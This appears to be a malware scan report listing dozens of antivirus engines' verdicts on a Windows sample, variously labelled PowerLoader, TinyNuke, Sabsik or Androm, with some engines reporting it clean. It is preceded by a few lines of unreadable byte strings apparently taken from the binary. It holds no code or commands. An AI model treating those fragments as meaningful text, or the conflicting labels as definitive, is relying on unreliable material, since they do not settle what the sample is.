ufWH9*
qcUG9+
xk^QD7*
{ocWK?3'
{peZOD9.#
i_UKA7-#
yoe[B90'
|sjaX[SKC;3+#
yrkd]VOHA:3,%
|wrmhc^
YWUSQOMKIGECA?=;97531/-+)'%
!#%')+-ilorux{~
#'+/37;?CGKOSW[_cgkosw{
"',16;@EJOTY^chmrw
Antivirus Signature
Bkav W64.AIDetectMalware
Lionic Trojan.Win32.PowerLoader.m!c
Elastic malicious (high confidence)
ClamAV Win.Malware.Tinukebot-10040717-0
CMC Clean
CAT-QuickHeal Trojan.Sabsik
Skyhigh BehavesLike.Win64.Generic.hc
ALYac Trojan.GenericKD.75828481
Cylance Unsafe
Zillya Clean
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba Trojan:Win64/PowerLoader.6a4197bb
K7GW Trojan ( 004c44741 )
K7AntiVirus Trojan ( 004c44741 )
huorong Trojan/Generic!0B2783847BB313E2
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec Trojan Horse
tehtris Clean
ESET-NOD32 a variant of Win64/PowerLoader.A
APEX Malicious
Avast Win64:MalwareX-gen [Trj]
Cynet Malicious (score: 100)
Kaspersky Backdoor.Win32.Androm.vviu
BitDefender Trojan.GenericKD.75828481
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.75828481
Tencent Malware.Win32.Gencirc.1431d3d8
Sophos Mal/Generic-S
F-Secure Trojan.TR/AVI.TinyNuke.gczrk
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfeeD ti!C401BE0D8B68
Trapmine malicious.high.ml.score
CTX exe.trojan.powerloader
Emsisoft Trojan.GenericKD.75828481 (B)
Ikarus Trojan.Win64.Powerloader
FireEye Generic.mg.a6b4918f763f99f9
Jiangmin Clean
Webroot Clean
Varist W64/ABTrojan.FPMR-3308
Avira TR/AVI.TinyNuke.gczrk
Fortinet W64/PowerLoader.A!tr
Antiy-AVL Trojan/Win32.Sabsik
Kingsoft malware.kb.a.1000
Gridinsoft Ransom.Win64.Sabsik.sa
Xcitium Malware@#phxs0pwyust1
Arcabit Trojan.Generic.D4850D01
SUPERAntiSpyware Clean
Microsoft Trojan:Win32/Wacatac.B!ml
Google Detected
AhnLab-V3 Malware/Win.Generic.R691650
Acronis suspicious
McAfee Artemis!A6B4918F763F
TACHYON Clean
VBA32 Clean
Malwarebytes Malware.AI.1267149139
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Malware.Undefined!8.C (TFE:2:J8X79kMbZOM)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
GData Win32.Trojan.CobaltStrike.KXKI7A
AVG Win64:MalwareX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Backdoor:Win/PowerLoader.A
No IRMA results available.